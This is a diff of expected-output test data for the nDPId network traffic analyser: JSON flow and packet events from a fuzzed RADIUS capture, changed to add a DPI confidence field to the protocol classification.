 00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"flow_datalink":1,"flow_max_packets":3}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1528996996259,"flow_last_seen":1528997692968,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":33079,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":72,"flow_first_seen":1528996996259,"flow_last_seen":1528997692968,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":33079,"flow_avg_l4_payload_len":459,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1528997654780,"flow_last_seen":1528997660003,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":2365,"flow_avg_l4_payload_len":591,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"ts_msec":1528997764910,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3}
 01321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1528997764910,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528997764910,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIRtAACUAAAAKDEAexuIZNXIQBxQClwAAAWkCj2WOGagJIQ3h2c\/0kWBqo7IaCgAAV8gOBFVTGgwAalfIyQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqeEATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jY6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1528997774688,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997774688,"pkt":"ABRP+4rqc9uYVcUnCABFAAClBRNAAPwRTvPG6hk1CgxAHgcUchAAkYpBC3AAiTMAZqtMn01XpTgevOOwYPEBNTCyMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMjExLjNncHBuZXR3b3JrLm9yZy4gNWIyMmE3ODYvZTA6NWY6NDU6OTA6MDk6NWYvMjMwTw4BAAAMFwwAAAwBf\/xQEt5biXJtQqmEfDYtwo6O3Ew="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00670{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997774822,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997774688,"flow_last_seen":1528997774688,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997774688,"l3_proto":"ip4","src_ip":"198.234.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997774822,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00595{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":205,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997774822,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1528997775506,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997775506,"pkt":"AAAMB6xAABRP+4rqCABFAALbISRAAP8RAAAKTEAexuIZNXIQBxQCxwAAAXICv9jhsXiK6zCbKgcltxzBMb4aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqePAQIwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jRBEwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CHljaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyL2QwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjECAAAJASthqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775506,"flow_last_seen":1528997775506,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997775506,"l3_proto":"ip4","src_ip":"10.76.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775573,"flow_last_seen":1528997775573,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1528997775573,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1528997775573,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528997775573,"pkt":"ABRP+4rqcNuYVcUnCABFAAClBSFAAPwRTuXG4hk1Cgyqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1528997775762,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"ts_msec":1528997775762,"pkt":"ABRP+4rqcNuYVcUvCABFAADABSVAAPwRTsbG4hk1CgxwHgcUchAArFncA3MApFzr0zNm1cGtfYGqw8gu2esBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMGE3ODQvYjA6OWY6YmE6NGE6MGU6N2UvMjI5EiIzMjc2NCBTdWJzY3JpYmVyIG5rdCBwcm92aXNpb25lZE8HBAEABwBQEol7YUaBxcy8xSb+BSA62Ds="}
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":210,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997775762,"flow_last_seen":1528997775762,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528997775762,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.112.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01357{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1528997777144,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997777144,"pkt":"AAAMB6xAABRP+4rqCABFAALHISdAAP8RAAAKVCUAxuIZNXIQBxQCswAAAXUCq0+RGyL6qp4kGgBnV02AqO8aCgAAV8gOBFVzGgwAAFfIDQZ3aWZpGg9zAFfICQlXSVNQUjEwGgkAADghDQM3NwZbItKBATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJWwwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZBMGFjMDAwMDAwYzg4a2E3MjI1YiwgNWIyMmE3OGMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjMxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyZ1AgAkFwEAAAsFAAB4gbzVxbw2lh1ax6mZCkrRAwIAIEu4WjAaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABNyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFBlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghTwYAAOsAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEiPn8\/WrP4cXVwKHtEGPFQc="}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997777144,"flow_last_seen":1528997777144,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997777144,"l3_proto":"ip4","src_ip":"10.84.37.0","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
